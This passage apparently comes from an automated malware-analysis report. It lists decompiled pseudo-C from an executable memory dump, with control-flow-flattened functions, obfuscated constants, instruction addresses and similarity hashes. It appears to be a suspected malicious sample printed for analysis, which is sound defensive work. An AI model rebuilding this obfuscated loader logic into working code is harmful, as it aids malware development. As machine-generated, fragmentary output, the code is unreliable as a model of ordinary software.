                                                                                                                                                                                                                    												if(_t272 == 0) {
                                                                                                                                                                                                                    													goto L16;
                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                    													goto L10;
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t269 != 0xff8405e) {
                                                                                                                                                                                                                    									goto L15;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									_t269 = 0x3b56937;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							L18:
                                                                                                                                                                                                                    							return _t270;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t266 = 0x10000;
                                                                                                                                                                                                                    						_t225 = E00A7C6D9(0x10000);
                                                                                                                                                                                                                    						_t237 = _t225;
                                                                                                                                                                                                                    						if(_t237 == 0) {
                                                                                                                                                                                                                    							_t238 = _v24;
                                                                                                                                                                                                                    							_t269 = 0x99e9ce5;
                                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							_v52 = _t225;
                                                                                                                                                                                                                    							_t272 = 0x10000;
                                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L18;
                                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                                    						_t225 = _v52;
                                                                                                                                                                                                                    					} while (_t269 != 0x99e9ce5);
                                                                                                                                                                                                                    					L16:
                                                                                                                                                                                                                    					_t270 = _v20;
                                                                                                                                                                                                                    					if(_t270 == 0) {
                                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						_t230 = _v8;
                                                                                                                                                                                                                    						 *_t230 = _t237;
                                                                                                                                                                                                                    						 *((intOrPtr*)(_t230 + 4)) = _t266 - _t272;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					goto L18;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}















































                                                                                                                                                                                                                    0x00a6b354
                                                                                                                                                                                                                    0x00a6b354
                                                                                                                                                                                                                    0x00a6b35b
                                                                                                                                                                                                                    0x00a6b35f
                                                                                                                                                                                                                    0x00a6b363
                                                                                                                                                                                                                    0x00a6b36b
                                                                                                                                                                                                                    0x00a6b373
                                                                                                                                                                                                                    0x00a6b37b
                                                                                                                                                                                                                    0x00a6b383
                                                                                                                                                                                                                    0x00a6b38b
                                                                                                                                                                                                                    0x00a6b393
                                                                                                                                                                                                                    0x00a6b398
                                                                                                                                                                                                                    0x00a6b3a0
                                                                                                                                                                                                                    0x00a6b3a8
                                                                                                                                                                                                                    0x00a6b3b0
                                                                                                                                                                                                                    0x00a6b3bd
                                                                                                                                                                                                                    0x00a6b3c3
                                                                                                                                                                                                                    0x00a6b3cb
                                                                                                                                                                                                                    0x00a6b3d3
                                                                                                                                                                                                                    0x00a6b3db
                                                                                                                                                                                                                    0x00a6b3e3
                                                                                                                                                                                                                    0x00a6b3eb
                                                                                                                                                                                                                    0x00a6b3f3
                                                                                                                                                                                                                    0x00a6b3fb
                                                                                                                                                                                                                    0x00a6b403
                                                                                                                                                                                                                    0x00a6b40b
                                                                                                                                                                                                                    0x00a6b41c
                                                                                                                                                                                                                    0x00a6b41f
                                                                                                                                                                                                                    0x00a6b423
                                                                                                                                                                                                                    0x00a6b42b
                                                                                                                                                                                                                    0x00a6b433
                                                                                                                                                                                                                    0x00a6b440
                                                                                                                                                                                                                    0x00a6b444
                                                                                                                                                                                                                    0x00a6b449
                                                                                                                                                                                                                    0x00a6b44d
                                                                                                                                                                                                                    0x00a6b455
                                                                                                                                                                                                                    0x00a6b45d
                                                                                                                                                                                                                    0x00a6b46d
                                                                                                                                                                                                                    0x00a6b471
                                                                                                                                                                                                                    0x00a6b479
                                                                                                                                                                                                                    0x00a6b481
                                                                                                                                                                                                                    0x00a6b489
                                                                                                                                                                                                                    0x00a6b493
                                                                                                                                                                                                                    0x00a6b494
                                                                                                                                                                                                                    0x00a6b498
                                                                                                                                                                                                                    0x00a6b4a0
                                                                                                                                                                                                                    0x00a6b4ae
                                                                                                                                                                                                                    0x00a6b4b2
                                                                                                                                                                                                                    0x00a6b4ba
                                                                                                                                                                                                                    0x00a6b4c2
                                                                                                                                                                                                                    0x00a6b4ca
                                                                                                                                                                                                                    0x00a6b4d2
                                                                                                                                                                                                                    0x00a6b4d7
                                                                                                                                                                                                                    0x00a6b4df
                                                                                                                                                                                                                    0x00a6b4e7
                                                                                                                                                                                                                    0x00a6b4ef
                                                                                                                                                                                                                    0x00a6b4f7
                                                                                                                                                                                                                    0x00a6b4ff
                                                                                                                                                                                                                    0x00a6b50c
                                                                                                                                                                                                                    0x00a6b511
                                                                                                                                                                                                                    0x00a6b519
                                                                                                                                                                                                                    0x00a6b521
                                                                                                                                                                                                                    0x00a6b526
                                                                                                                                                                                                                    0x00a6b52e
                                                                                                                                                                                                                    0x00a6b536
                                                                                                                                                                                                                    0x00a6b540
                                                                                                                                                                                                                    0x00a6b548
                                                                                                                                                                                                                    0x00a6b550
                                                                                                                                                                                                                    0x00a6b558
                                                                                                                                                                                                                    0x00a6b560
                                                                                                                                                                                                                    0x00a6b56f
                                                                                                                                                                                                                    0x00a6b572
                                                                                                                                                                                                                    0x00a6b576
                                                                                                                                                                                                                    0x00a6b57a
                                                                                                                                                                                                                    0x00a6b582
                                                                                                                                                                                                                    0x00a6b58a
                                                                                                                                                                                                                    0x00a6b592
                                                                                                                                                                                                                    0x00a6b59a
                                                                                                                                                                                                                    0x00a6b5a2
                                                                                                                                                                                                                    0x00a6b5aa
                                                                                                                                                                                                                    0x00a6b5b2
                                                                                                                                                                                                                    0x00a6b5ba
                                                                                                                                                                                                                    0x00a6b5c2
                                                                                                                                                                                                                    0x00a6b5ca
                                                                                                                                                                                                                    0x00a6b5cf
                                                                                                                                                                                                                    0x00a6b5d3
                                                                                                                                                                                                                    0x00a6b5d7
                                                                                                                                                                                                                    0x00a6b5df
                                                                                                                                                                                                                    0x00a6b5e3
                                                                                                                                                                                                                    0x00a6b5eb
                                                                                                                                                                                                                    0x00a6b5f3
                                                                                                                                                                                                                    0x00a6b5fb
                                                                                                                                                                                                                    0x00a6b607
                                                                                                                                                                                                                    0x00a6b60a
                                                                                                                                                                                                                    0x00a6b60e
                                                                                                                                                                                                                    0x00a6b612
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b61e
                                                                                                                                                                                                                    0x00a6b61e
                                                                                                                                                                                                                    0x00a6b61e
                                                                                                                                                                                                                    0x00a6b630
                                                                                                                                                                                                                    0x00a6b65e
                                                                                                                                                                                                                    0x00a6b660
                                                                                                                                                                                                                    0x00a6b663
                                                                                                                                                                                                                    0x00a6b669
                                                                                                                                                                                                                    0x00a6b756
                                                                                                                                                                                                                    0x00a6b75a
                                                                                                                                                                                                                    0x00a6b76c
                                                                                                                                                                                                                    0x00a6b66f
                                                                                                                                                                                                                    0x00a6b66f
                                                                                                                                                                                                                    0x00a6b675
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b67b
                                                                                                                                                                                                                    0x00a6b67b
                                                                                                                                                                                                                    0x00a6b67f
                                                                                                                                                                                                                    0x00a6b681
                                                                                                                                                                                                                    0x00a6b6ec
                                                                                                                                                                                                                    0x00a6b6ec
                                                                                                                                                                                                                    0x00a6b6f0
                                                                                                                                                                                                                    0x00a6b6f0
                                                                                                                                                                                                                    0x00a6b6f4
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b683
                                                                                                                                                                                                                    0x00a6b68f
                                                                                                                                                                                                                    0x00a6b698
                                                                                                                                                                                                                    0x00a6b69d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b6a3
                                                                                                                                                                                                                    0x00a6b6b7
                                                                                                                                                                                                                    0x00a6b6ce
                                                                                                                                                                                                                    0x00a6b6d3
                                                                                                                                                                                                                    0x00a6b6d5
                                                                                                                                                                                                                    0x00a6b6d8
                                                                                                                                                                                                                    0x00a6b6df
                                                                                                                                                                                                                    0x00a6b6e2
                                                                                                                                                                                                                    0x00a6b6e6
                                                                                                                                                                                                                    0x00a6b6ea
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b6ea
                                                                                                                                                                                                                    0x00a6b69d
                                                                                                                                                                                                                    0x00a6b681
                                                                                                                                                                                                                    0x00a6b675
                                                                                                                                                                                                                    0x00a6b632
                                                                                                                                                                                                                    0x00a6b638
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b63e
                                                                                                                                                                                                                    0x00a6b63e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b63e
                                                                                                                                                                                                                    0x00a6b638
                                                                                                                                                                                                                    0x00a6b74d
                                                                                                                                                                                                                    0x00a6b755
                                                                                                                                                                                                                    0x00a6b755
                                                                                                                                                                                                                    0x00a6b702
                                                                                                                                                                                                                    0x00a6b70c
                                                                                                                                                                                                                    0x00a6b711
                                                                                                                                                                                                                    0x00a6b716
                                                                                                                                                                                                                    0x00a6b720
                                                                                                                                                                                                                    0x00a6b724
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b718
                                                                                                                                                                                                                    0x00a6b718
                                                                                                                                                                                                                    0x00a6b71c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b71c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b729
                                                                                                                                                                                                                    0x00a6b729
                                                                                                                                                                                                                    0x00a6b72d
                                                                                                                                                                                                                    0x00a6b739
                                                                                                                                                                                                                    0x00a6b739
                                                                                                                                                                                                                    0x00a6b73f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b741
                                                                                                                                                                                                                    0x00a6b741
                                                                                                                                                                                                                    0x00a6b747
                                                                                                                                                                                                                    0x00a6b749
                                                                                                                                                                                                                    0x00a6b749
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b73f

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: k}$rI{K$~DB$!.
                                                                                                                                                                                                                    • API String ID: 0-2756600009
                                                                                                                                                                                                                    • Opcode ID: 2f61d8f887b853c95e31fa19557b6edab5baace50d4476d45e4d2e687fe68c3b
                                                                                                                                                                                                                    • Instruction ID: 3ebd93cc911b83307647be26430c0bc8fb7bedbb44113713cc0827cca72014e7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f61d8f887b853c95e31fa19557b6edab5baace50d4476d45e4d2e687fe68c3b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36B12F725083419FC358CF6AC48580BFBF1BBC8758F108A1DF59A96220C3B5C989CF92
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                    			E00A71ABD(void* __edx, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				void* __ecx;
                                                                                                                                                                                                                    				void* _t141;
                                                                                                                                                                                                                    				signed int _t162;
                                                                                                                                                                                                                    				signed int _t173;
                                                                                                                                                                                                                    				signed int _t174;
                                                                                                                                                                                                                    				signed int _t175;
                                                                                                                                                                                                                    				signed int _t176;
                                                                                                                                                                                                                    				signed int _t177;
                                                                                                                                                                                                                    				void* _t180;
                                                                                                                                                                                                                    				signed int* _t207;
                                                                                                                                                                                                                    				signed int* _t210;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t207 = _a8;
                                                                                                                                                                                                                    				_t206 = _a16;
                                                                                                                                                                                                                    				_push(_a16);
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_push(_t207);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				E00A7C6D8(_t141);
                                                                                                                                                                                                                    				_v36 = 0xfa84bf;
                                                                                                                                                                                                                    				_t210 =  &(( &_v76)[6]);
                                                                                                                                                                                                                    				_t180 = 0x6521cd0;
                                                                                                                                                                                                                    				_t173 = 0x69;
                                                                                                                                                                                                                    				_v36 = _v36 / _t173;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x000262c9;
                                                                                                                                                                                                                    				_v32 = 0xc23a06;
                                                                                                                                                                                                                    				_v32 = _v32 + 0x3554;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x00c7eb7e;
                                                                                                                                                                                                                    				_v56 = 0x17cca8;
                                                                                                                                                                                                                    				_t174 = 0x45;
                                                                                                                                                                                                                    				_v56 = _v56 * 0x7b;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x5f5961f1;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x54349678;
                                                                                                                                                                                                                    				_v76 = 0x9b2a81;
                                                                                                                                                                                                                    				_v76 = _v76 / _t174;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x414c8b58;
                                                                                                                                                                                                                    				_v76 = _v76 + 0xffffd217;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x4144ae44;
                                                                                                                                                                                                                    				_v60 = 0x8b4fb9;
                                                                                                                                                                                                                    				_v60 = _v60 << 0xa;
                                                                                                                                                                                                                    				_v60 = _v60 >> 8;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x002061a3;
                                                                                                                                                                                                                    				_a8 = 0x1f5c7;
                                                                                                                                                                                                                    				_a8 = _a8 | 0xbd843dd1;
                                                                                                                                                                                                                    				_t175 = 0xc;
                                                                                                                                                                                                                    				_a8 = _a8 * 0x65;
                                                                                                                                                                                                                    				_a8 = _a8 >> 8;
                                                                                                                                                                                                                    				_a8 = _a8 ^ 0x00cf46ad;
                                                                                                                                                                                                                    				_v40 = 0x78e61d;
                                                                                                                                                                                                                    				_v40 = _v40 >> 4;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x000baa35;
                                                                                                                                                                                                                    				_v68 = 0xb2838a;
                                                                                                                                                                                                                    				_v68 = _v68 << 3;
                                                                                                                                                                                                                    				_v68 = _v68 + 0xfffff16f;
                                                                                                                                                                                                                    				_v68 = _v68 * 0x6d;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x60040e87;
                                                                                                                                                                                                                    				_v72 = 0xda6da2;
                                                                                                                                                                                                                    				_v72 = _v72 / _t175;
                                                                                                                                                                                                                    				_v72 = _v72 + 0xffff4764;
                                                                                                                                                                                                                    				_t176 = 0x4f;
                                                                                                                                                                                                                    				_v72 = _v72 * 5;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x00530950;
                                                                                                                                                                                                                    				_v64 = 0xc0e6cd;
                                                                                                                                                                                                                    				_v64 = _v64 + 0xffff35a4;
                                                                                                                                                                                                                    				_v64 = _v64 / _t176;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x0009df0f;
                                                                                                                                                                                                                    				_v44 = 0xf881ea;
                                                                                                                                                                                                                    				_v44 = _v44 >> 3;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x00169f9f;
                                                                                                                                                                                                                    				_v48 = 0x3aea9e;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x29f312ea;
                                                                                                                                                                                                                    				_t177 = 0x24;
                                                                                                                                                                                                                    				_v48 = _v48 * 0x55;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0xe000c8b6;
                                                                                                                                                                                                                    				_v52 = 0x26499;
                                                                                                                                                                                                                    				_v52 = _v52 / _t177;
                                                                                                                                                                                                                    				_v52 = _v52 >> 3;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x000c528c;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t180 != 0x2436bc9) {
                                                                                                                                                                                                                    						if(_t180 == 0x5d6c45d) {
                                                                                                                                                                                                                    							_t162 = E00A7C6D9(_t207[1]);
                                                                                                                                                                                                                    							 *_t207 = _t162;
                                                                                                                                                                                                                    							__eflags = _t162;
                                                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                                                    								_t180 = 0xb4be317;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t180 == 0x6521cd0) {
                                                                                                                                                                                                                    								_t180 = 0xa6b2e2f;
                                                                                                                                                                                                                    								 *_t207 =  *_t207 & 0x00000000;
                                                                                                                                                                                                                    								_t207[1] = _v36;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t180 == 0xa6b2e2f) {
                                                                                                                                                                                                                    									_t207[1] = E00A676EE(_t206);
                                                                                                                                                                                                                    									_t180 = 0x5d6c45d;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t180 == 0xabb5f66) {
                                                                                                                                                                                                                    										_t125 =  &_v72; // 0x530950
                                                                                                                                                                                                                    										E00A6DA0C(_v68,  *((intOrPtr*)(_t206 + 0x24)),  &_v28,  *_t125);
                                                                                                                                                                                                                    										_t210 =  &(_t210[2]);
                                                                                                                                                                                                                    										_t180 = 0xf0a58dd;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t180 == 0xb4be317) {
                                                                                                                                                                                                                    											E00A773B3(_v76, _v60,  &_v28, _t207, _a8, _v40);
                                                                                                                                                                                                                    											_t210 =  &(_t210[4]);
                                                                                                                                                                                                                    											_t180 = 0xabb5f66;
                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											_t218 = _t180 - 0xf0a58dd;
                                                                                                                                                                                                                    											if(_t180 != 0xf0a58dd) {
                                                                                                                                                                                                                    												goto L16;
                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                    												E00A6B7B7(_v64, _t206 + 0x3c, _t218, _v44,  &_v28);
                                                                                                                                                                                                                    												_t180 = 0x2436bc9;
                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L17;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					E00A6B7B7(_v48, _t206 + 0x1c, __eflags, _v52,  &_v28);
                                                                                                                                                                                                                    					_t180 = 0x9ba7694;
                                                                                                                                                                                                                    					L16:
                                                                                                                                                                                                                    					__eflags = _t180 - 0x9ba7694;
                                                                                                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                                                                                                    				L17:
                                                                                                                                                                                                                    				__eflags =  *_t207;
                                                                                                                                                                                                                    				_t140 =  *_t207 != 0;
                                                                                                                                                                                                                    				__eflags = _t140;
                                                                                                                                                                                                                    				return 0 | _t140;
                                                                                                                                                                                                                    			}



























                                                                                                                                                                                                                    0x00a71ac3
                                                                                                                                                                                                                    0x00a71ac8
                                                                                                                                                                                                                    0x00a71acc
                                                                                                                                                                                                                    0x00a71acd
                                                                                                                                                                                                                    0x00a71ad1
                                                                                                                                                                                                                    0x00a71ad2
                                                                                                                                                                                                                    0x00a71ad8
                                                                                                                                                                                                                    0x00a71add
                                                                                                                                                                                                                    0x00a71ae5
                                                                                                                                                                                                                    0x00a71aee
                                                                                                                                                                                                                    0x00a71af5
                                                                                                                                                                                                                    0x00a71afa
                                                                                                                                                                                                                    0x00a71b00
                                                                                                                                                                                                                    0x00a71b08
                                                                                                                                                                                                                    0x00a71b10
                                                                                                                                                                                                                    0x00a71b18
                                                                                                                                                                                                                    0x00a71b20
                                                                                                                                                                                                                    0x00a71b2d
                                                                                                                                                                                                                    0x00a71b30
                                                                                                                                                                                                                    0x00a71b34
                                                                                                                                                                                                                    0x00a71b3c
                                                                                                                                                                                                                    0x00a71b44
                                                                                                                                                                                                                    0x00a71b54
                                                                                                                                                                                                                    0x00a71b58
                                                                                                                                                                                                                    0x00a71b60
                                                                                                                                                                                                                    0x00a71b68
                                                                                                                                                                                                                    0x00a71b70
                                                                                                                                                                                                                    0x00a71b78
                                                                                                                                                                                                                    0x00a71b7d
                                                                                                                                                                                                                    0x00a71b82
                                                                                                                                                                                                                    0x00a71b8a
                                                                                                                                                                                                                    0x00a71b92
                                                                                                                                                                                                                    0x00a71b9f
                                                                                                                                                                                                                    0x00a71ba2
                                                                                                                                                                                                                    0x00a71ba6
                                                                                                                                                                                                                    0x00a71bab
                                                                                                                                                                                                                    0x00a71bb3
                                                                                                                                                                                                                    0x00a71bbb
                                                                                                                                                                                                                    0x00a71bc0
                                                                                                                                                                                                                    0x00a71bc8
                                                                                                                                                                                                                    0x00a71bd0
                                                                                                                                                                                                                    0x00a71bd5
                                                                                                                                                                                                                    0x00a71be2
                                                                                                                                                                                                                    0x00a71be6
                                                                                                                                                                                                                    0x00a71bee
                                                                                                                                                                                                                    0x00a71bfe
                                                                                                                                                                                                                    0x00a71c02
                                                                                                                                                                                                                    0x00a71c0f
                                                                                                                                                                                                                    0x00a71c10
                                                                                                                                                                                                                    0x00a71c14
                                                                                                                                                                                                                    0x00a71c1c
                                                                                                                                                                                                                    0x00a71c24
                                                                                                                                                                                                                    0x00a71c32
                                                                                                                                                                                                                    0x00a71c36
                                                                                                                                                                                                                    0x00a71c3e
                                                                                                                                                                                                                    0x00a71c46
                                                                                                                                                                                                                    0x00a71c4d
                                                                                                                                                                                                                    0x00a71c5a
                                                                                                                                                                                                                    0x00a71c62
                                                                                                                                                                                                                    0x00a71c71
                                                                                                                                                                                                                    0x00a71c72
                                                                                                                                                                                                                    0x00a71c76
                                                                                                                                                                                                                    0x00a71c7e
                                                                                                                                                                                                                    0x00a71c91
                                                                                                                                                                                                                    0x00a71c95
                                                                                                                                                                                                                    0x00a71c9a
                                                                                                                                                                                                                    0x00a71ca2
                                                                                                                                                                                                                    0x00a71ca2
                                                                                                                                                                                                                    0x00a71cb4
                                                                                                                                                                                                                    0x00a71d7e
                                                                                                                                                                                                                    0x00a71d83
                                                                                                                                                                                                                    0x00a71d86
                                                                                                                                                                                                                    0x00a71d88
                                                                                                                                                                                                                    0x00a71d8a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a71d8a
                                                                                                                                                                                                                    0x00a71cba
                                                                                                                                                                                                                    0x00a71cc0
                                                                                                                                                                                                                    0x00a71d66
                                                                                                                                                                                                                    0x00a71d68
                                                                                                                                                                                                                    0x00a71d6b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a71cc6
                                                                                                                                                                                                                    0x00a71cc8
                                                                                                                                                                                                                    0x00a71d55
                                                                                                                                                                                                                    0x00a71d58
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a71cce
                                                                                                                                                                                                                    0x00a71cd4
                                                                                                                                                                                                                    0x00a71d2c
                                                                                                                                                                                                                    0x00a71d3c
                                                                                                                                                                                                                    0x00a71d41
                                                                                                                                                                                                                    0x00a71d44
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a71cd6
                                                                                                                                                                                                                    0x00a71cd8
                                                                                                                                                                                                                    0x00a71d1a
                                                                                                                                                                                                                    0x00a71d1f
                                                                                                                                                                                                                    0x00a71d22
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a71cda
                                                                                                                                                                                                                    0x00a71cda
                                                                                                                                                                                                                    0x00a71ce0
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a71ce6
                                                                                                                                                                                                                    0x00a71cf6
                                                                                                                                                                                                                    0x00a71cfd
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a71cfd
                                                                                                                                                                                                                    0x00a71ce0
                                                                                                                                                                                                                    0x00a71cd8
                                                                                                                                                                                                                    0x00a71cd4
                                                                                                                                                                                                                    0x00a71cc8
                                                                                                                                                                                                                    0x00a71cc0
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a71cb4
                                                                                                                                                                                                                    0x00a71da1
                                                                                                                                                                                                                    0x00a71da8
                                                                                                                                                                                                                    0x00a71dad
                                                                                                                                                                                                                    0x00a71dad
                                                                                                                                                                                                                    0x00a71dad
                                                                                                                                                                                                                    0x00a71db9
                                                                                                                                                                                                                    0x00a71dbb
                                                                                                                                                                                                                    0x00a71dc0
                                                                                                                                                                                                                    0x00a71dc0
                                                                                                                                                                                                                    0x00a71dc7

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: /.k$PS$PS$T5
                                                                                                                                                                                                                    • API String ID: 0-2730689353
                                                                                                                                                                                                                    • Opcode ID: 9f624bee5596c3fe3fe45769de06bf2f180c92c5ccead8f3949f8df73e55cc72
                                                                                                                                                                                                                    • Instruction ID: 4eb14f3f722dfee629164e4f66c313a69f1b52578c3e205f4d8a1219378c5e6a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f624bee5596c3fe3fe45769de06bf2f180c92c5ccead8f3949f8df73e55cc72
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE8166715083028FC718CF2AC98541BBBF1FBC8758F10891DF18A96260D770DA49CF82
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                    			E00A78851(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                    				char _v4;
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				void* _t155;
                                                                                                                                                                                                                    				void* _t178;
                                                                                                                                                                                                                    				signed int _t179;
                                                                                                                                                                                                                    				signed int _t180;
                                                                                                                                                                                                                    				signed int _t181;
                                                                                                                                                                                                                    				void* _t184;
                                                                                                                                                                                                                    				intOrPtr* _t195;
                                                                                                                                                                                                                    				void* _t196;
                                                                                                                                                                                                                    				signed int* _t199;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a16);
                                                                                                                                                                                                                    				_t195 = __ecx;
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t155);
                                                                                                                                                                                                                    				_v48 = 0xed7bc;
                                                                                                                                                                                                                    				_t199 =  &(( &_v68)[6]);
                                                                                                                                                                                                                    				_v48 = _v48 >> 5;
                                                                                                                                                                                                                    				_t196 = 0;
                                                                                                                                                                                                                    				_t184 = 0x52d82ac;
                                                                                                                                                                                                                    				_t179 = 0x79;
                                                                                                                                                                                                                    				_v48 = _v48 * 0x15;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x0009bd80;
                                                                                                                                                                                                                    				_v60 = 0x56f0d4;
                                                                                                                                                                                                                    				_v60 = _v60 / _t179;
                                                                                                                                                                                                                    				_v60 = _v60 | 0x4ee2c4b0;
                                                                                                                                                                                                                    				_t180 = 0x2b;
                                                                                                                                                                                                                    				_v60 = _v60 / _t180;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x01d5a683;
                                                                                                                                                                                                                    				_v36 = 0x28e223;
                                                                                                                                                                                                                    				_v36 = _v36 << 0xd;
                                                                                                                                                                                                                    				_v36 = _v36 | 0x152c08aa;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x1d6839f2;
